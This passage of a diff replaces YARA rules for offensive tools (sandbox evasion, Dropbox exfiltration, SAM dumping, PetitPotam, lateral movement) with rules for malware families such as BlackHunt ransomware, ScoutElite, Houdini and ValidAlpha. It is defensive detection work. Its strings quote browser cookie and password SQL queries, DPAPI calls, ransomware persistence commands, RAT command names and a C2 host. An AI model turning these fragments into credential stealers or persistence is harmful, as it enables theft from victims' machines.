-		$s5 = "PrivilegeChecker" fullword ascii
-		$s6 = "FileChecker" fullword ascii
-		$s7 = "DriverChecker" fullword ascii
-		$s8 = "ProcessChecker" fullword ascii
-		$s9 = "DirectoryChecker" fullword ascii
-		$s10 = "RegistryChecker" fullword ascii
-		$s11 = "CheckDriver" fullword ascii
-		$s12 = "CheckServices" fullword ascii
-		$s13 = "CheckDirectories" fullword ascii
-		$s14 = "CheckCurrentProcessModules" fullword ascii
-		$s15 = "CheckProcesses" fullword ascii
-		$s16 = "CheckDrivers" fullword ascii
-		$s17 = "CheckProcess" fullword ascii
-		$s18 = "CheckSubDirectory" fullword ascii
-		$s19 = "CheckDirectory" fullword ascii
-		$s20 = "CheckRegistry" fullword ascii
+		$s1 = "! #\"'&(&*)>=@?POQOROSOTOUOVOWOXOYOZO[O^]{z|z}z~z" fullword wide
+		$s2 = "{0}{1}{2}" fullword wide
+		$s3 = "localhost" fullword wide
+		$s4 = "\\tdata" fullword wide
+		$s5 = "DecryptBlob" fullword ascii
+		$s6 = "GetMac" fullword ascii
+		$s7 = "GetHdc" fullword ascii
+		$s8 = "FindProc" fullword ascii
+		$s9 = "targetPid" fullword ascii
+		$s10 = "MessageSecurityOverTcp" fullword ascii
+		$s11 = "ListOfProcesses" fullword ascii
+		$s12 = "ListOfPrograms" fullword ascii
+		$s13 = "browserPaths" fullword ascii
+		$s14 = "configs" fullword ascii
+		$s15 = "scanners" fullword ascii
+		$s16 = "FileScannerRule" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 10 of ( $s* ) or ( 1 of ( $pdb* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( #x3 > 4 and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and 7 of ( $s* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ANT_Invizzzible : FILE
+
+rule DITEKSHEN_MALWARE_Win_Mediapi : FILE
 {
 	meta:
-		description = "Detect InviZzzible"
+		description = "Detects MediaPI"
 		author = "ditekSHen"
-		id = "23533d1c-e0d8-51c8-ac18-60c845bff197"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "95db8772-1bcd-5eea-956c-c9578b8e1329"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1025-L1059"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11425-L11439"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd84015f9fdc160a6ed9010c5a5905fcf13987b1fdec6fdd9535e315dc3617e8"
+		logic_hash = "2bce0a96b45e46c0cbd913dacb3dfe7ae1b519102d637e0fd9dabe2008037d94"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\\\.\\pipe\\task_sched_se" fullword wide
-		$s2 = "\\\\\\.\\NPF_NdisWanIp" fullword wide
-		$s3 = /--action --(dtt|mra|user-input|cfg|dan|evt|pid|exc|wmi|tsh)/ fullword wide
-		$s4 = "cuckoo_%lu.ini" fullword wide
-		$s5 = "sandbox evasion" wide nocase
-		$s6 = "UnbalancedStack" fullword ascii
-		$s7 = "process_with_long_name" fullword ascii
-		$s8 = "DelaysAccumulation" fullword ascii
-		$s9 = "PidReuse" fullword ascii
-		$s10 = "DeadAnalyzer" fullword ascii
-		$s11 = "SleepDummyPatch" fullword ascii
-		$s12 = "AudioDeviceAbsence" fullword ascii
-		$s14 = "\\\\.\\PhysicalDrive%u" fullword ascii
-		$s15 = "\"countermeasures\":" ascii
-		$s16 = "_%.02u%.02u%.02u_%.02u%.02u%.02u.html" ascii
-		$f1 = ".?AVHyperV@SandboxEvasion@@" ascii
-		$f2 = ".?AVJoebox@SandboxEvasion@@" ascii
-		$f3 = ".?AVKVM@SandboxEvasion@@" ascii
-		$f4 = ".?AVMisc@SandboxEvasion@@" ascii
-		$f5 = ".?AVParallels@SandboxEvasion@@" ascii
-		$f6 = ".?AVQEMU@SandboxEvasion@@" ascii
-		$f7 = ".?AVSandboxie@SandboxEvasion@@" ascii
-		$f8 = ".?AVVBOX@SandboxEvasion@@" ascii
-		$f9 = ".?AVVirtualPC@SandboxEvasion@@" ascii
-		$f10 = ".?AVVMWare@SandboxEvasion@@" ascii
-		$f11 = ".?AVWine@SandboxEvasion@@" ascii
-		$f12 = ".?AVXen@SandboxEvasion@@" ascii
+		$s1 = "SomeFunction" ascii
+		$s2 = "\"stealth" ascii
+		$s3 = "\"ServAddr" ascii
+		$s4 = "\"ServPort" ascii
+		$s5 = "\"ServIp" ascii
+		$s6 = "\"wsaData" ascii
+		$s7 = "\"-socket" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $f* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( 6 of them ) or ( 3 of them and pe.exports ( "SomeFunction" ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXFIL_Sharpbox : FILE
+rule DITEKSHEN_MALWARE_Win_Blackhunt : FILE
 {
 	meta:
-		description = "Detect SharpBox, C# tool for compressing, encrypting, and exfiltrating data to Dropbox using the Dropbox API"
+		description = "Detects BlackHunt ransomware"
 		author = "ditekSHen"
-		id = "cd834fe2-dc77-509d-a8f9-d631f395bcd8"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "4bdb26dd-a424-54a6-b313-e98bdf18cfce"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1061-L1080"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11441-L11456"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b03ab3786b2a2e6774d94be4edf700a7154d8d400c7b2b31c73c68ce9fe0c08a"
+		logic_hash = "62e9bc505eff3e19ff0cdaf180e45e6d7917f0bec7cd9b007bee9fe1d9d09b66"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "UploadData" fullword ascii
-		$s2 = "isAttached" fullword ascii
-		$s3 = "DecryptFile" fullword ascii
-		$s4 = "set_dbxPath" fullword ascii
-		$s5 = "set_dbxToken" fullword ascii
-		$s6 = "set_decrypt" fullword ascii
-		$s7 = "GeneratePass" fullword ascii
-		$s8 = "FileUploadToDropbox" fullword ascii
-		$s9 = "\\SharpBox.pdb" ascii
-		$s10 = "https://content.dropboxapi.com/2/files/upload" fullword wide
-		$s12 = "Dropbox-API-Arg: {\"path\":" wide
-		$s13 = "X509Certificate [{0}] Policy Error: '{1}'" fullword wide
+		$s1 = /#BlackHunt_(Logs|BG|Icon|Public|Private|ID|ReadMe|Update)\.(txt|jpg|ico|key|hta)/ ascii wide
+		$s2 = /-(biggame|noencrypt|netinfo|nospread)/ fullword wide
+		$s3 = "/v \"*BlackHunt\" /t REG_SZ /d" wide
+		$s4 = "/sc onstart /TN \"Windows Critical Update\" /TR \"'%s' %s\" /F" wide
+		$s5 = "/v \"DisableChangePassword\" /t REG_DWORD /d" wide
+		$s6 = "<span> %s </span>this ID (<span> %s </span>)" wide
+		$s7 = "}div.header h1 span#hunter" wide
+		$s8 = "BLACK_HUNT_MUTEX" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Serioussam01 : CVE_2021_36934 FILE
+
+rule DITEKSHEN_MALWARE_Win_Scoutelite : FILE
 {
 	meta:
-		description = "Detect tool variants potentially exploiting SeriousSAM / HiveNightmare CVE-2021-36934"
+		description = "Detects ScoutElite"
 		author = "ditekSHen"
-		id = "e8f24ae4-48fb-5ee7-9e8e-0d144bb3b046"
-		date = "2024-09-25"
-		modified = "2024-09-25"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1082-L1104"
+		id = "989f558b-f84c-5f64-b85d-618d83f96782"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11458-L11531"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b9de87dc073e6ba3eb36dd57b31e9749849c2e277f2bcd1c98ffc2d02861e10"
+		logic_hash = "935bd891a9b68cb6ddad86db843de624f3a7ec0824f2b4c6ff0da56422b79668"
 		score = 75
-		quality = 25
-		tags = "CVE-2021-36934, FILE"
+		quality = 50
+		tags = "FILE"
 
 	strings:
-		$s1 = "VolumeShadowCopy" fullword wide
-		$s2 = "\\\\?\\GLOBALROOT\\Device\\" fullword wide
-		$s3 = "{0}\\{1}$:aad3b435b51404eeaad3b435b51404ee:{2}" fullword wide
-		$s4 = "ASPNET_WP_PASSWORD" fullword wide
-		$s5 = "<ParseSam>b__" ascii
-		$s6 = "<DumpSecret" ascii
-		$s7 = "<ParseSecret" ascii
-		$s8 = "LsaSecretBlob" fullword ascii
-		$s9 = "systemHive" fullword ascii
-		$s10 = "ImportHiveDump" fullword ascii
-		$s11 = "FindShadowVolumes" fullword ascii
-		$s12 = "GetBootKey" fullword ascii
-		$r1 = "[*] SAM" wide
-		$r2 = "[*] SYSTEM" wide
-		$r3 = "[*] SECURITY" wide
+		$cmd1 = "command=scote_ping" fullword ascii
+		$cmd2 = "command=scote_info_ipconfig" fullword ascii
+		$cmd3 = "command=scote_info_systeminfo" fullword ascii
+		$cmd4 = "command=scote_connection|hwid=" fullword ascii
+		$cmd5 = "command=ping" fullword wide
+		$cmd6 = "command=screen_capture_init" fullword wide
+		$cmd7 = "command=screen_capture" fullword wide
+		$cmd8 = "command=silence_screenshot" fullword wide
+		$cmd9 = "command=silence_keylogger" fullword wide
+		$cmd10 = "command=silence_password" fullword wide
+		$cmd11 = "command=screen_thumb" fullword wide
+		$cmd12 = "command=filemanager_upload_tcp" fullword wide
+		$cmd13 = "command=filemanager_download" fullword wide
+		$cmd14 = "command=filemanager_init" fullword wide
+		$cmd15 = "command=filemanager_root" fullword wide
+		$cmd16 = "command=filemanager_folder_filemanager_file" fullword wide
+		$cmd17 = "command=filemanager_thumb" fullword wide
+		$cmd18 = "command=keylogger_init" fullword wide
+		$cmd19 = "command=keylogger_file" fullword wide
+		$cmd20 = "command=password_firefox" fullword wide
+		$cmd21 = "command=password_opera" fullword wide
+		$cmd22 = "command=password_chrome" fullword wide
+		$cmd23 = "command=password_all" fullword wide
+		$cmd24 = "command=password_init" fullword wide
+		$cmd25 = "command=misc_init" fullword wide
+		$cmd26 = "command=misc_process" fullword wide
+		$cmd27 = "command=misc_cmd" fullword wide
+		$cmd28 = "command=new_rcs" fullword wide
+		$cmd29 = "command=microphone_capture" fullword wide
+		$cmd30 = "command=microphone_capture_init" fullword wide
+		$cmd31 = "command=rvmedia_capture_init" fullword wide
+		$cmd32 = "command=rvmedia_list" fullword wide
+		$cmd33 = "command=rvmedia_resolution" fullword wide
+		$cmd34 = "command=webcam_capture_init" fullword wide
+		$cmd35 = "command=webcam_list" fullword wide
+		$cmd36 = "command=webcam_resolution" fullword wide
+		$cmd37 = "command=webcam_capture" fullword wide
+		$gcmd1 = "filemanager_download_ftp" fullword wide
+		$gcmd2 = "download_file_ftp" fullword wide
+		$gcmd3 = "filemanager_upload_http" fullword wide
+		$gcmd4 = "upload_file_http" fullword wide
+		$gcmd5 = "upload_url" fullword wide
+		$gcmd6 = "filemanager_delete" fullword wide
+		$gcmd7 = "filemanager_execute_file" fullword wide
+		$gcmd8 = /(microphone|webcam|rvmedia|keylogger|password|screen|filemanager)_(host|port|guid)/ nocase
+		$confs1 = "[nick_name]" fullword ascii
+		$confe1 = "[/nick_name]" fullword ascii wide
+		$confs2 = "[install_name]" fullword ascii wide
+		$confe2 = "[/install_name]" fullword ascii wide
+		$confs3 = "[install_folder]" fullword ascii wide
+		$confe3 = "[/install_folder]" fullword ascii wide
+		$confs4 = "[reg_startup]" fullword ascii wide
+		$confe4 = "[/reg_startup]" fullword ascii wide
+		$confs5 = "[folder_startup]" fullword ascii wide
+		$confe5 = "[/folder_startup]" fullword ascii wide
+		$confs6 = "[task_startup]" fullword ascii wide
+		$confe6 = "[/task_startup]" fullword ascii wide
+		$confs7 = "[injection]" fullword ascii wide
+		$confe7 = "[/injection]" fullword ascii wide
+		$confs8 = "[injection_process]" fullword ascii wide
+		$confe8 = "[/injection_process]" fullword ascii wide
+		$confs9 = "[connection]" fullword ascii wide
+		$confe9 = "[/connection]" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $r* ) and 3 of ( $s* ) ) )
+		( uint16( 0 ) == 0x5a4d and ( 2 of ( $cmd* ) or 7 of ( $gcmd* ) or ( 2 of ( $confs* ) and 2 of ( $confe* ) ) or ( pe.exports ( "__elite" ) and 2 of them ) ) ) or ( 15 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Petitpotam01 : FILE
+rule DITEKSHEN_MALWARE_Win_Scouteliteps
 {
 	meta:
-		description = "Detect tool potentially exploiting/attempting PetitPotam"
-		author = "ditekSHen"
-		id = "12d7b533-f477-5fbb-8b1f-1a93c9a63500"
-		date = "2024-09-25"
-		modified = "2024-09-25"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1127-L1143"
+		description = "Detects actor PowerShell tool designed to steal browsers session cookie and passwords on-disk and in-memory"
+		author = "ditekshen"
+		id = "d2c04d55-9bf7-54f5-8053-835fa60f19cb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11534-L11569"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37a9477b41560904e8874ecaf93eb2667b9450b5d42665677abc1442538f9000"
+		logic_hash = "9b1047b8b485fcfa29225f53674050703d32498cfa99654c8ac5f8bfac29878e"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 37
+		tags = ""
 
 	strings:
-		$s1 = "\\pipe\\lsarpc" fullword wide
-		$s2 = "\\%s" fullword wide
-		$s3 = "ncacn_np" fullword wide
-		$s4 = /EfsRpc(OpenFileRaw|EncryptFileSrv|DecryptFileSrv|QueryUsersOnFile|QueryRecoveryAgents|RemoveUsersFromFile|AddUsersToFile)/ wide
-		$r1 = "RpcBindingFromStringBindingW" fullword ascii
-		$r2 = "RpcStringBindingComposeW" fullword ascii
-		$r3 = "RpcStringFreeW" fullword ascii
-		$r4 = "RPCRT4.dll" fullword ascii
-		$r5 = "NdrClientCall2" fullword ascii
+		$cnc1 = "http://beginpassport.com" ascii wide nocase
+		$cnc2 = "f_dump.php" ascii wide nocase
+		$cnc3 = "c_dump.php" ascii wide nocase
+		$cnc4 = "o_dump.php" ascii wide nocase
+		$db1 = "\\Google\\Chrome\\User Data\\Default\\Cookies" ascii wide nocase
+		$db2 = "\\Mozilla\\Firefox\\Profiles\\*.default" ascii wide nocase
+		$db3 = "\\Opera Software\\Opera Stable\\Cookies" ascii wide nocase
+		$db4 = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default" ascii nocase
+		$db5 = "$($env:APPDATA)\\Mozilla\\Firefox\\Profiles\\*.default" ascii nocase
+		$db6 = "$($env:APPDATA)\\Opera Software\\Opera Stable" ascii nocase
+		$cond1 = "SSID" ascii wide
+		$cond2 = "MSPAuth" ascii wide
+		$cond3 = "\"'T'\"" ascii wide
+		$cond4 = "SNS_AA" ascii wide
+		$cond5 = "X-APPLE-WEBAUTH-TOKEN" ascii wide
+		$sql1 = "SELECT * FROM 'cookies' WHERE host_key LIKE $" ascii wide nocase
+		$sql2 = "SELECT * FROM 'moz_cookies' WHERE host LIKE $" ascii wide nocase
+		$sql3 = "SELECT origin_url, username_value ,password_value FROM 'logins'" ascii nocase
+		$def1 = "Add-Type -AssemblyName System.Security" ascii wide nocase
+		$def2 = "System.Security.SecureString" ascii wide nocase
+		$def3 = "ConvertFrom-SecureString" ascii wide nocase
+		$def4 = "[System.Security.Cryptography.ProtectedData]::Unprotect(" ascii wide nocase
+		$def5 = "[Security.Cryptography.DataProtectionScope]::LocalMachine" ascii wide nocase
+		$def6 = "[Security.Cryptography.DataProtectionScope]::CurrentUser" ascii wide nocase
+		$def7 = "System.Data.SQLite.SQLiteConnection" ascii wide nocase
+		$def8 = "[Environment]::OSVersion.ToString().Replace(\"Microsoft Windows \"," ascii wide nocase
+		$def9 = "Start-Sleep" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and 4 of ( $r* ) )
+		(1 of ( $cnc* ) and any of ( $db* ) and any of ( $cond* ) and any of ( $sql* ) and 7 of ( $def* ) ) or ( all of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpstrike : FILE
+rule DITEKSHEN_MALWARE_Win_Houdiniconfig : FILE
 {
 	meta:
-		description = "Detect SharpStrike post-exploitation tool written in C# that uses either CIM or WMI to query remote systems"
-		author = "ditekSHen"
-		id = "00b36fce-3d84-51cf-a800-042d7484d78c"
-		date = "2024-09-25"
-		modified = "2024-09-25"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1145-L1160"
+		description = "Detects Houdini Trojan configurations"
+		author = "ditekshen"
+		id = "e4f974fe-731e-55a8-aa5f-068a1e62f54d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11600-L11616"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c479d85878d9f9659fc157f0c6706703af3748a8740df6a5090cddc720dd7661"
+		logic_hash = "70a67c9a91d2f82184f1d7a5ea51de911a054dd4e38e2cc36f495ed59219afab"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "SharpStrike v" wide
-		$x2 = "[*] Agent is busy" wide
-		$x3 = "SharpStrike_Fody" fullword ascii
-		$s1 = "ServiceLayer.CIM" fullword ascii
-		$s2 = "Models.CIM" fullword ascii
-		$s3 = "<HandleCommand>b__" ascii
-		$s4 = "MemoryStream" fullword ascii
-		$s5 = "GetCommands" fullword ascii
+		$s1 = "install_name="
+		$s2 = "nick_name="
+		$s3 = "install_folder="
+		$s4 = "reg_startup="
+		$s5 = "startup_folder_startup="
+		$s6 = "task_startup="
+		$s7 = "injection="
+		$s8 = "injection_process"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladon : FILE
+rule DITEKSHEN_MALWARE_Win_Houdini : FILE
 {
 	meta:
-		description = "Detect Ladon tool that assists in lateral movement across a network"
-		author = "ditekSHen"
-		id = "227e63ce-8383-5bb1-870e-6c4e767b402f"
-		date = "2024-09-25"
-		modified = "2024-09-25"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1162-L1178"
+		description = "Detects the raw binary of the Houdini Trojan Delphi variant"
+		author = "ditekshen"
+		id = "79681ca3-b956-52d4-81b8-b3bd4c86872a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11618-L11689"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f31276bcbcae672966cfddc9af4f5b507d7244360b421de7fe1e811fb954fb7d"
+		logic_hash = "0580d2525d9d989f98e815dd98b9258724b6e31f058092132c0fbd67cbc5c63c"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
 
 	strings:
-		$d1 = "Ladon.VncSharp.dll" fullword ascii
-		$d2 = "Ladon.Renci.SshNet.dll" fullword ascii
-		$s1 = "Ladon." ascii
-		$s2 = "nowPos" fullword ascii
-		$s3 = "Scan" fullword ascii
-		$s4 = "QLZ_STREAMING_BUFFER" fullword ascii
-		$s5 = "sizeDecompressed" fullword ascii
-		$s6 = "UpdateByte" fullword ascii
-		$s7 = "kNumBitPriceShiftBits" fullword ascii
+		$hc = "houdiniclient" ascii wide nocase
+		$mk1 = "keylogger_thread" fullword ascii
+		$mk2 = "keyloger_host" fullword ascii
+		$mk3 = "keylogger_port" fullword ascii
+		$mk4 = "keylogger_thread" fullword ascii
+		$mk5 = "keylogger_init" fullword wide
+		$mk6 = "keylogger_stop" fullword wide
+		$mk7 = "keylogger_offline" fullword wide
+		$mk8 = "silence_keylogger" fullword wide
+		$ms1 = "screenshot_thread" fullword ascii
+		$ms2 = "screen_host" fullword ascii
+		$ms3 = "screen_port" fullword ascii
+		$ms4 = "screenshot_init" fullword wide
+		$ms5 = "screenshot_start" fullword wide
+		$ms6 = "screenshot_stop" fullword wide
+		$ms7 = "screen_thumb" fullword wide
+		$ms8 = "silence_screenshot" fullword wide
+		$mf1 = "file_manager_init" fullword wide
+		$mf2 = "file_manager_root" fullword wide
+		$mf3 = "file_manager_faf" fullword wide
+		$mf4 = "file_manager_download" fullword wide
+		$mf5 = "file_manager_upload" fullword wide
+		$mf6 = "file_manager_stop" fullword wide
+		$mf7 = "file_manager_delete_folder" fullword wide
+		$mf8 = "file_manager_rename_folder" fullword wide
+		$mf9 = "file_manager_rename_file" fullword wide
+		$mf10 = "file_manager_delete_file" fullword wide
+		$mf11 = "file_manager_execute_file" fullword wide
+		$mf12 = "file_manager_thumb" fullword wide
+		$mf13 = "file_manager_upload_http" fullword wide
+		$mf14 = "file_manager_upload_tcp" fullword wide
+		$mf15 = "upload_file_tcp" fullword wide
+		$mf16 = "download_file_tcp" fullword wide
+		$mf17 = "upload_file_http" fullword wide
+		$mf18 = "filemanager_host" fullword ascii
+		$mf19 = "filemanager_port" fullword ascii
+		$mf20 = "filemanager_thread" fullword ascii
+		$mp1 = "password_value" fullword wide
+		$mp2 = "password_init" fullword wide
+		$mp3 = "password_stop" fullword wide
+		$mp4 = "password_firefox" fullword wide
+		$mp5 = "password_chrome" fullword wide
+		$mp6 = "password_all" fullword wide
+		$mp7 = "password_host" fullword ascii
+		$mp8 = "password_port" fullword ascii
+		$mp9 = "password_thread" fullword ascii
+		$mm1 = "misc_init" fullword wide
+		$mm2 = "misc_stop" fullword wide
+		$mm3 = "misc_process_list" fullword wide
+		$mm4 = "misc_module_list" fullword wide
+		$mm5 = "misc_process_terminate" fullword wide
+		$mm6 = "misc_host" fullword ascii
+		$mm7 = "misc_port" fullword ascii
+		$mm8 = "misc_thread" fullword ascii
+		$pl1 = "plugin_file_init" fullword wide
+		$pl2 = "plugin_url_init" fullword wide
+		$pl3 = "plugin_stop" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $d* ) or all of ( $s* ) or ( 1 of ( $d* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladonexp : FILE
+rule DITEKSHEN_MALWARE_Win_Lighthand : FILE
 {
 	meta:
-		description = "Detect Ladon tool that assists in lateral movement across a network"
-		author = "ditekSHen"
-		id = "bd1e7ef5-ae68-5e0d-8261-0eb765453bae"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects LightHand"
+		author = "ditekshen"
+		id = "2b644dfb-f09a-50a5-8260-7b7022bce1f4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1180-L1191"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11691-L11718"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "22f6a717b8464bddd850bb5ea8b416e99bceb91fe917f188be178f2fff620730"
+		logic_hash = "4f06467a522b786045839e6b22b888cecc554b0f63cc20dc43dc0f8ec80f5654"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "txt_cscandll.Text" fullword wide
-		$s2 = "CscanWebExpBuild.frmMain.resources" fullword ascii
-		$s3 = "= \"$HttpXforwardedFor$\";" ascii
-		$s4 = "namespace netscan" fullword ascii
+		$x1 = "27.102." ascii
+		$x2 = "109.248.150.179" fullword ascii
+		$s1 = /Hello (Client|Server)/ fullword ascii
+		$s2 = "%s|%s|%s|%s|%s|%s|" fullword wide
+		$s3 = "%s\\cmd.exe" fullword wide
+		$s4 = "Remote PC" fullword wide
+		$s5 = { 2e 62 61 74 [3-4] 3a 4c 31 0d 0a 64 65 6c
+                20 2f 46 20 22 25 73 22 0d 0a 69 66 20 65 78 69
+                73 74 20 22 25 73 22 20 67 6f 74 6f 20 4c 31 0d
+                0a 64 65 6c 20 2f 46 20 22 25 73 22 0d 0a 00 00
+                6f 70 65 6e }
+		$s6 = { 25 00 2e 00 32 00 66 00 47 00 42 00 00 00 00 00
+                25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00
+                0a 00 00 00 00 00 00 00 5c 00 2a 00 2e 00 2a 00
+                00 00 00 00 0a 00 00 00 2e 00 00 00 2e 00 2e 00
+                00 00 00 00 00 00 00 00 46 00 6f 00 6c 00 64 00
+                65 00 72 00 00 00 00 00 25 00 73 00 5c 00 25 00
+                73 00 00 00 00 00 00 00 25 00 64 00 42 00 00 00
+                25 00 2e 00 31 00 66 00 4b 00 42 00 00 00 00 00
+                25 00 2e 00 31 00 66 00 4d 00 42 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladongo : FILE
+rule DITEKSHEN_MALWARE_Win_Validalpha : FILE
 {
 	meta:
-		description = "Detect LadonGo tool that assists in lateral movement across a network"
-		author = "ditekSHen"
-		id = "4dbf7f24-b9ab-5629-8e78-667d9623dea9"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects ValidApha / BlackRAT"
+		author = "ditekshen"
+		id = "3162eb5f-6e2d-598a-b199-22b70ec8a773"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1193-L1207"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11720-L11736"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "606172b8fb251cb4ad75de40b55d74779aef6409832f6edf09068083143ec749"
+		logic_hash = "54d170076d1b32cee6f6252d40548acc7e23b467d692c59d6146a8aadf431211"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$f1 = "main.VulDetection" fullword ascii
-		$f2 = "main.BruteFor" fullword ascii
-		$f3 = "main.RemoteExec" fullword ascii
-		$f4 = "main.Exploit" fullword ascii
-		$f5 = "main.Noping" fullword ascii
-		$f6 = "main.LadonScan" fullword ascii
-		$f7 = "main.LadonUrlScan" fullword ascii
+		$x1 = "RAT/Black/" ascii
+		$x2 = "RAT/Black/Client_Go/" ascii
+		$s1 = "main.RunTask" fullword ascii
+		$s2 = "main.CmdShell" fullword ascii
+		$s3 = "main.SelfDelete" fullword ascii
+		$s4 = "main.RecvPacket" fullword ascii
+		$s5 = "main.FileDownload" fullword ascii
+		$s6 = "main.CaptureScreen" fullword ascii
+		$s7 = "main.PeekNamedPipe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xface ) and 5 of ( $f* )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ENC_Diskcryptor : FILE
